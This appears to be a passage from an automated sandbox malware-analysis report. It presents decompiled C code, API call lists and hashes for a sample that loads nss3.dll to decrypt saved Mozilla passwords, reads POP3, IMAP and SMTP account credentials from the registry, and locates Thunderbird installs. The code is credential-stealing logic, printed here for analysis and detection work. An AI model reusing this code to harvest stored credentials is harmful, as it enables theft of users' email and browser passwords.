                                                              						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
                                                              						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
                                                              					} else {
                                                              						_t53 = LoadLibraryExA( &_v532, _t44, 8);
                                                              						 *_t69 = _t53;
                                                              						if(_t53 != 0) {
                                                              							goto L9;
                                                              						} else {
                                                              							E0040DEA9();
                                                              							_t56 = LoadLibraryExA( &_v532, 0, 8);
                                                              							 *_t69 = _t56;
                                                              							if(_t56 != 0) {
                                                              								goto L9;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return 0 |  *_t69 != 0x00000000;
                                                              			}














                                                              0x0040deee
                                                              0x0040df08
                                                              0x0040df0f
                                                              0x0040df1b
                                                              0x0040df26
                                                              0x0040df2b
                                                              0x0040df33
                                                              0x0040df3e
                                                              0x0040df4b
                                                              0x0040df5b
                                                              0x0040df62
                                                              0x0040df6c
                                                              0x0040df7f
                                                              0x0040df88
                                                              0x0040dfa5
                                                              0x0040df8a
                                                              0x0040df9c
                                                              0x0040dfa2
                                                              0x0040dfb3
                                                              0x0040dfbb
                                                              0x0040dfbd
                                                              0x0040dfef
                                                              0x0040e005
                                                              0x0040e011
                                                              0x0040e01d
                                                              0x0040e029
                                                              0x0040e035
                                                              0x0040e041
                                                              0x0040e046
                                                              0x0040dfbf
                                                              0x0040dfcf
                                                              0x0040dfd3
                                                              0x0040dfd5
                                                              0x00000000
                                                              0x0040dfd7
                                                              0x0040dfd7
                                                              0x0040dfe7
                                                              0x0040dfeb
                                                              0x0040dfed
                                                              0x00000000
                                                              0x00000000
                                                              0x0040dfed
                                                              0x0040dfd5
                                                              0x0040dfbd
                                                              0x0040e053

                                                              APIs
                                                              • memset.MSVCRT ref: 0040DF0F
                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                              • memset.MSVCRT ref: 0040DF62
                                                              • strlen.MSVCRT ref: 0040DF6C
                                                              • strlen.MSVCRT ref: 0040DF7A
                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                              • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                              • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                              • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                              • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                              • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                              • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                              • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                              • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                              • API String ID: 1296682400-4029219660
                                                              • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                              • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                              • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                              • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 35%
                                                              			E00402606(void* __ecx, void* __fp0) {
                                                              				void* __esi;
                                                              				void* _t58;
                                                              				void* _t59;
                                                              				void* _t67;
                                                              				void* _t70;
                                                              				void* _t73;
                                                              				void* _t87;
                                                              				signed int _t90;
                                                              				void* _t92;
                                                              				signed int _t96;
                                                              				intOrPtr _t100;
                                                              				intOrPtr _t101;
                                                              				void* _t103;
                                                              				void* _t105;
                                                              				void* _t106;
                                                              				void* _t108;
                                                              				void* _t114;
                                                              
                                                              				_t114 = __fp0;
                                                              				_t92 = __ecx;
                                                              				_t103 = _t105 - 0x6c;
                                                              				_t106 = _t105 - 0x474;
                                                              				 *(_t103 + 0x4c) = "POP3 User Name";
                                                              				 *(_t103 + 0x50) = "IMAP User Name";
                                                              				 *(_t103 + 0x54) = "HTTPMail User Name";
                                                              				 *(_t103 + 0x58) = "SMTP USer Name";
                                                              				 *(_t103 + 0x1c) = "POP3 Server";
                                                              				 *(_t103 + 0x20) = "IMAP Server";
                                                              				 *(_t103 + 0x24) = "HTTPMail Server";
                                                              				 *(_t103 + 0x28) = "SMTP Server";
                                                              				 *(_t103 + 0x3c) = "POP3 Password2";
                                                              				 *(_t103 + 0x40) = "IMAP Password2";
                                                              				 *(_t103 + 0x44) = "HTTPMail Password2";
                                                              				 *(_t103 + 0x48) = "SMTP Password2";
                                                              				 *(_t103 + 0x2c) = "POP3 Port";
                                                              				 *(_t103 + 0x30) = "IMAP Port";
                                                              				 *(_t103 + 0x34) = "HTTPMail Port";
                                                              				 *(_t103 + 0x38) = "SMTP Port";
                                                              				 *(_t103 + 0x5c) = "POP3 Secure Connection";
                                                              				 *(_t103 + 0x60) = "IMAP Secure Connection";
                                                              				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
                                                              				 *(_t103 + 0x68) = "SMTP Secure Connection";
                                                              				_t90 = 0;
                                                              				do {
                                                              					 *(_t103 - 0x64) = 0;
                                                              					memset(_t103 - 0x63, 0, 0x7f);
                                                              					_push(_t103 - 0x64);
                                                              					_t96 = _t90 << 2;
                                                              					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
                                                              					_push( *((intOrPtr*)(_t103 + 0x78)));
                                                              					_t58 = 0x7f;
                                                              					_t59 = E0040EB80(_t58, _t92);
                                                              					_t106 = _t106 + 0x18;
                                                              					if(_t59 == 0) {
                                                              						E004021D8(_t103 - 0x408);
                                                              						strcpy(_t103 - 0x1f4, _t103 - 0x64);
                                                              						_t100 =  *((intOrPtr*)(_t103 + 0x78));
                                                              						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
                                                              						_t34 = _t90 + 1; // 0x1
                                                              						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
                                                              						_push(_t103 - 0x2f8);
                                                              						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
                                                              						_push(_t100);
                                                              						_t67 = 0x7f;
                                                              						E0040EB80(_t67, _t92);
                                                              						_push(_t103 - 0x3fc);
                                                              						_push("SMTP Display Name");
                                                              						_push(_t100);
                                                              						_t70 = 0x7f;
                                                              						E0040EB80(_t70, _t92);
                                                              						_push(_t103 - 0x378);
                                                              						_push("SMTP Email Address");
                                                              						_push(_t100);
                                                              						_t73 = 0x7f;
                                                              						E0040EB80(_t73, _t92);
                                                              						_t108 = _t106 + 0x2c;
                                                              						if(_t90 != 3) {
                                                              							_push(_t103 - 0x278);
                                                              							_push("SMTP Server");
                                                              							_push(_t100);
                                                              							_t87 = 0x7f;
                                                              							E0040EB80(_t87, _t92);
                                                              							_t108 = _t108 + 0xc;
                                                              						}
                                                              						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
                                                              						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
                                                              						_t106 = _t108 + 0x18;
                                                              						_t101 =  *((intOrPtr*)(_t103 + 0x74));
                                                              						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
                                                              						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
                                                              						_pop(_t92);
                                                              						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
                                                              					}
                                                              					_t90 = _t90 + 1;
                                                              				} while (_t90 < 4);
                                                              				return _t59;
                                                              			}




















                                                              0x00402606
                                                              0x00402606
                                                              0x00402607
                                                              0x0040260b
                                                              0x00402614
                                                              0x0040261b
                                                              0x00402622
                                                              0x00402629
                                                              0x00402630
                                                              0x00402637
                                                              0x0040263e
                                                              0x00402645
                                                              0x0040264c
                                                              0x00402653
                                                              0x0040265a
                                                              0x00402661
                                                              0x00402668
                                                              0x0040266f
                                                              0x00402676
                                                              0x0040267d
                                                              0x00402684
                                                              0x0040268b
                                                              0x00402692
                                                              0x00402699
                                                              0x004026a0
                                                              0x004026a2
                                                              0x004026aa
                                                              0x004026ae
                                                              0x004026b6
                                                              0x004026b9
                                                              0x004026bc
                                                              0x004026c0
                                                              0x004026c5
                                                              0x004026c6
                                                              0x004026cb
                                                              0x004026d0
                                                              0x004026dc
                                                              0x004026ec
                                                              0x004026f4
                                                              0x004026f7
                                                              0x004026fd
                                                              0x00402700
                                                              0x0040270c
                                                              0x0040270d
                                                              0x00402711
                                                              0x00402714
                                                              0x00402715
                                                              0x00402720
                                                              0x00402721
                                                              0x00402726
                                                              0x00402729
                                                              0x0040272a
                                                              0x00402735
                                                              0x00402736
                                                              0x0040273b
                                                              0x0040273e
                                                              0x0040273f
                                                              0x00402744
                                                              0x0040274a
                                                              0x00402752
                                                              0x00402753
                                                              0x00402758
                                                              0x0040275b
                                                              0x0040275c
                                                              0x00402761
                                                              0x00402761
                                                              0x0040276d
                                                              0x0040277b
                                                              0x00402780
                                                              0x00402791
                                                              0x00402796
                                                              0x004027a9
                                                              0x004027af
                                                              0x004027b7
                                                              0x004027b7
                                                              0x004027bc
                                                              0x004027bd
                                                              0x004027cd

                                                              APIs
                                                              • memset.MSVCRT ref: 004026AE
                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                              • strcpy.MSVCRT(?,?,?,?,?,75D6ED80,?,00000000), ref: 004026EC
                                                              • strcpy.MSVCRT(?,?), ref: 004027A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy$QueryValuememset
                                                              • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                              • API String ID: 3373037483-1627711381
                                                              • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                              • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                              • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                              • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 97%
                                                              			E004027D0(void* __fp0) {
                                                              				void* __esi;
                                                              				void* _t66;
                                                              				signed int _t92;
                                                              				void* _t95;
                                                              				intOrPtr _t109;
                                                              				void* _t111;
                                                              				void* _t113;
                                                              				void* _t114;
                                                              				void* _t121;
                                                              
                                                              				_t121 = __fp0;
                                                              				_t111 = _t113 - 0x70;
                                                              				_t114 = _t113 - 0x474;
                                                              				 *(_t111 + 0x40) = "POP3 Password";
                                                              				 *(_t111 + 0x44) = "IMAP Password";
                                                              				 *(_t111 + 0x48) = "HTTP Password";
                                                              				 *(_t111 + 0x4c) = "SMTP Password";
                                                              				 *(_t111 + 0x50) = "POP3 User";
                                                              				 *(_t111 + 0x54) = "IMAP User";
                                                              				 *(_t111 + 0x58) = "HTTP User";
                                                              				 *(_t111 + 0x5c) = "SMTP User";
                                                              				 *(_t111 + 0x20) = "POP3 Server";
                                                              				 *(_t111 + 0x24) = "IMAP Server";
                                                              				 *(_t111 + 0x28) = "HTTP Server URL";
                                                              				 *(_t111 + 0x2c) = "SMTP Server";
                                                              				 *(_t111 + 0x30) = "POP3 Port";
                                                              				 *(_t111 + 0x34) = "IMAP Port";
                                                              				 *(_t111 + 0x38) = "HTTP Port";
                                                              				 *(_t111 + 0x3c) = "SMTP Port";
                                                              				 *(_t111 + 0x60) = "POP3 Use SPA";
                                                              				 *(_t111 + 0x64) = "IMAP Use SPA";
                                                              				 *(_t111 + 0x68) = "HTTPMail Use SSL";
                                                              				 *(_t111 + 0x6c) = "SMTP Use SSL";
                                                              				_t92 = 0;
                                                              				do {
                                                              					 *(_t111 - 0x60) = 0;
                                                              					memset(_t111 - 0x5f, 0, 0x7f);
                                                              					_t114 = _t114 + 0xc;
                                                              					_t100 = _t92 << 2;
                                                              					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
                                                              					if(_t66 != 0) {
                                                              						E004021D8(_t111 - 0x404);
                                                              						strcpy(_t111 - 0x1f0, _t111 - 0x60);
                                                              						_pop(_t95);
                                                              						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
                                                              						_t37 = _t92 + 1; // 0x1
                                                              						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
                                                              						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
                                                              						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
                                                              						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
                                                              						if(_t92 != 3) {
                                                              							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
                                                              							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
                                                              							_t114 = _t114 + 0xc;
                                                              						}
                                                              						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
                                                              						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
                                                              						_t109 =  *((intOrPtr*)(_t111 + 0x78));
                                                              						_t114 = _t114 + 0x18;
                                                              						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
                                                              						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
                                                              						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
                                                              					}
                                                              					_t92 = _t92 + 1;
                                                              				} while (_t92 < 4);
                                                              				return _t66;
                                                              			}












                                                              0x004027d0
                                                              0x004027d1
                                                              0x004027d5
                                                              0x004027de
                                                              0x004027e5
                                                              0x004027ec
                                                              0x004027f3
                                                              0x004027fa
                                                              0x00402801
                                                              0x00402808
                                                              0x0040280f
                                                              0x00402816
                                                              0x0040281d
                                                              0x00402824
                                                              0x0040282b
                                                              0x00402832
                                                              0x00402839
                                                              0x00402840
                                                              0x00402847
                                                              0x0040284e
                                                              0x00402855
                                                              0x0040285c
                                                              0x00402863
                                                              0x0040286a
                                                              0x0040286c
                                                              0x00402874
                                                              0x00402878
                                                              0x0040287d
                                                              0x00402882
                                                              0x0040288f
                                                              0x00402896
                                                              0x004028a2
                                                              0x004028b2
                                                              0x004028c1
                                                              0x004028c6
                                                              0x004028cf
                                                              0x004028d8
                                                              0x004028de
                                                              0x004028f1
                                                              0x00402904
                                                              0x0040290c
                                                              0x0040291c
                                                              0x0040292d
                                                              0x00402932
                                                              0x00402932
                                                              0x00402940
                                                              0x00402950
                                                              0x00402955
                                                              0x00402958
                                                              0x0040296d
                                                              0x00402980
                                                              0x0040298e
                                                              0x0040298e
                                                              0x00402993
                                                              0x00402994
                                                              0x004029a4

                                                              APIs
                                                              • memset.MSVCRT ref: 00402878
                                                                • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                              • strcpy.MSVCRT(?,?,75D6ED80,?,00000000), ref: 004028B2
                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,75D6ED80,?,00000000), ref: 00402980
                                                                • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                              • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                              • API String ID: 2416467034-4086712241
                                                              • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                              • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                              • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                              • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 81%
                                                              			E0040F435(CHAR* __eax) {
                                                              				void* _v8;
                                                              				int _v12;
                                                              				void _v267;
                                                              				char _v268;
                                                              				void _v531;
                                                              				char _v532;
                                                              				void _v787;
                                                              				char _v788;
                                                              				void _v1051;
                                                              				char _v1052;
                                                              				void _v2075;
                                                              				char _v2076;
                                                              				void* __esi;
                                                              				void* _t45;
                                                              				void* _t59;
                                                              				char* _t60;
                                                              				char* _t71;
                                                              				char* _t75;
                                                              				void* _t84;
                                                              				CHAR* _t89;
                                                              				void* _t90;
                                                              				void* _t91;
                                                              				void* _t92;
                                                              				void* _t93;
                                                              
                                                              				_t89 = __eax;
                                                              				_v1052 = 0;
                                                              				memset( &_v1051, 0, 0x104);
                                                              				_v788 = 0;
                                                              				memset( &_v787, 0, 0xff);
                                                              				 *_t89 = 0;
                                                              				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
                                                              				_t91 = _t90 + 0x24;
                                                              				if(_t45 != 0) {
                                                              					L12:
                                                              					strcpy(_t89,  &_v1052);
                                                              					if( *_t89 == 0) {
                                                              						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
                                                              						if(E0040F3BA(_t89) == 0) {
                                                              							 *_t89 = 0;
                                                              						}
                                                              						if( *_t89 == 0) {
                                                              							E00406172(_t89);
                                                              							if(E0040F3BA(_t89) == 0) {
                                                              								 *_t89 = 0;
                                                              							}
                                                              							if( *_t89 == 0) {
                                                              								GetCurrentDirectoryA(0x104, _t89);
                                                              								if(E0040F3BA(_t89) == 0) {
                                                              									 *_t89 = 0;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              					return 0 |  *_t89 != 0x00000000;
                                                              				} else {
                                                              					_v268 = 0;
                                                              					memset( &_v267, 0, 0xff);
                                                              					_v12 = 0;
                                                              					_t59 = E0040EC05(_v8, 0,  &_v268);
                                                              					_t92 = _t91 + 0x18;
                                                              					while(_t59 == 0) {
                                                              						_push(7);
                                                              						_t60 =  &_v268;
                                                              						_push("mozilla");
                                                              						_push(_t60);
                                                              						L00411642();
                                                              						_t93 = _t92 + 0xc;
                                                              						if(_t60 == 0) {
                                                              							_v532 = 0;
                                                              							memset( &_v531, 0, 0x104);
                                                              							_v2076 = 0;
                                                              							memset( &_v2075, 0, 0x3ff);
                                                              							_push( &_v268);
                                                              							_push("%s\\bin");
                                                              							_push(0x3ff);
                                                              							_push( &_v2076);
                                                              							L00411648();
                                                              							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
                                                              							_t71 =  &_v532;
                                                              							_push(0x5c);
                                                              							_push(_t71);
                                                              							L0041164E();
                                                              							_t93 = _t93 + 0x44;
                                                              							if(_t71 != 0) {
                                                              								 *_t71 = 0;
                                                              							}
                                                              							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
                                                              								_push( &_v788);
                                                              								_t75 =  &_v268;
                                                              								L004115C4();
                                                              								_t84 = _t75;
                                                              								if(_t75 > 0) {
                                                              									strcpy( &_v1052,  &_v532);
                                                              									strcpy( &_v788,  &_v268);
                                                              									_t93 = _t93 + 0x10;
                                                              								}
                                                              							}
                                                              						}
                                                              						_v12 = _v12 + 1;
                                                              						_t59 = E0040EC05(_v8, _v12,  &_v268);
                                                              						_t92 = _t93 + 0xc;
                                                              					}
                                                              					RegCloseKey(_v8);
                                                              					goto L12;
                                                              				}
                                                              			}



























                                                              0x0040f449
                                                              0x0040f453
                                                              0x0040f459
                                                              0x0040f46b
                                                              0x0040f471
                                                              0x0040f484
                                                              0x0040f486
                                                              0x0040f48b
                                                              0x0040f490
                                                              0x0040f5e6
                                                              0x0040f5ee
                                                              0x0040f5f7
                                                              0x0040f600
                                                              0x0040f60e
                                                              0x0040f610
                                                              0x0040f610
                                                              0x0040f614
                                                              0x0040f616
                                                              0x0040f623
                                                              0x0040f625
                                                              0x0040f625
                                                              0x0040f629
                                                              0x0040f62d
                                                              0x0040f63b
                                                              0x0040f63d
                                                              0x0040f63d
                                                              0x0040f63b
                                                              0x0040f629
                                                              0x0040f614
                                                              0x0040f64a
                                                              0x0040f496
                                                              0x0040f4a3
                                                              0x0040f4a9
                                                              0x0040f4b9
                                                              0x0040f4bc
                                                              0x0040f4c1
                                                              0x0040f5d5
                                                              0x0040f4c9
                                                              0x0040f4cb
                                                              0x0040f4d1
                                                              0x0040f4d6
                                                              0x0040f4d7
                                                              0x0040f4dc
                                                              0x0040f4e1
                                                              0x0040f4f0
                                                              0x0040f4f6
                                                              0x0040f508
                                                              0x0040f50e
                                                              0x0040f519
                                                              0x0040f51a
                                                              0x0040f525
                                                              0x0040f52a
                                                              0x0040f52b
                                                              0x0040f547
                                                              0x0040f54c
                                                              0x0040f552
                                                              0x0040f554
                                                              0x0040f555
                                                              0x0040f55a
                                                              0x0040f55f
                                                              0x0040f561
                                                              0x0040f561
                                                              0x0040f569
                                                              0x0040f581
                                                              0x0040f582
                                                              0x0040f589
                                                              0x0040f591
                                                              0x0040f592
                                                              0x0040f5a2
                                                              0x0040f5b5
                                                              0x0040f5ba
                                                              0x0040f5ba
                                                              0x0040f592
                                                              0x0040f569
                                                              0x0040f5bd
                                                              0x0040f5cd
                                                              0x0040f5d2
                                                              0x0040f5d2
                                                              0x0040f5e0
                                                              0x00000000
                                                              0x0040f5e0

                                                              APIs
                                                              • memset.MSVCRT ref: 0040F459
                                                              • memset.MSVCRT ref: 0040F471
                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                              • memset.MSVCRT ref: 0040F4A9
                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                              • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                              • memset.MSVCRT ref: 0040F4F6
                                                              • memset.MSVCRT ref: 0040F50E
                                                              • _snprintf.MSVCRT ref: 0040F52B
                                                              • _mbsrchr.MSVCRT ref: 0040F555
                                                              • _mbsicmp.MSVCRT ref: 0040F589
                                                              • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                              • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                              • API String ID: 3269028891-3267283505
                                                              • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                              • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                              • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                              • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E0040F126(void* __edi, char* _a4, char* _a8) {
                                                              				int _v8;
                                                              				void _v263;
                                                              				char _v264;
                                                              				void _v519;
                                                              				char _v520;
                                                              				intOrPtr _t32;
                                                              				void* _t58;
                                                              				char* _t60;
                                                              				void* _t61;
                                                              				void* _t62;
                                                              
                                                              				_t58 = __edi;
                                                              				_v264 = 0;
                                                              				memset( &_v263, 0, 0xfe);
                                                              				_v520 = 0;
                                                              				memset( &_v519, 0, 0xfe);
                                                              				_t62 = _t61 + 0x18;
                                                              				_v8 = 1;
                                                              				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
                                                              					_v8 = 0;
                                                              				}
                                                              				_t60 = _a4;
                                                              				 *_t60 = 0;
                                                              				if(_v8 != 0) {
                                                              					strcpy(_t60, "<font");
                                                              					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                              					if(_t32 > 0) {
                                                              						sprintf( &_v264, " size=\"%d\"", _t32);
                                                              						strcat(_t60,  &_v264);
                                                              						_t62 = _t62 + 0x14;
                                                              					}
                                                              					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                              					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                              						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
                                                              						strcat(_t60,  &_v264);
                                                              					}
                                                              					strcat(_t60, ">");
                                                              				}
                                                              				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                              					strcat(_t60, "<b>");
                                                              				}
                                                              				strcat(_t60, _a8);
                                                              				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                              					strcat(_t60, "</b>");
                                                              				}
                                                              				if(_v8 != 0) {
                                                              					strcat(_t60, "</font>");
                                                              				}
                                                              				return _t60;
                                                              			}













                                                              0x0040f126
                                                              0x0040f141
                                                              0x0040f147
                                                              0x0040f155
                                                              0x0040f15b
                                                              0x0040f160
                                                              0x0040f167
                                                              0x0040f16e
                                                              0x0040f175
                                                              0x0040f175
                                                              0x0040f17b
                                                              0x0040f17e
                                                              0x0040f180
                                                              0x0040f188
                                                              0x0040f18d
                                                              0x0040f194
                                                              0x0040f1a3
                                                              0x0040f1b0
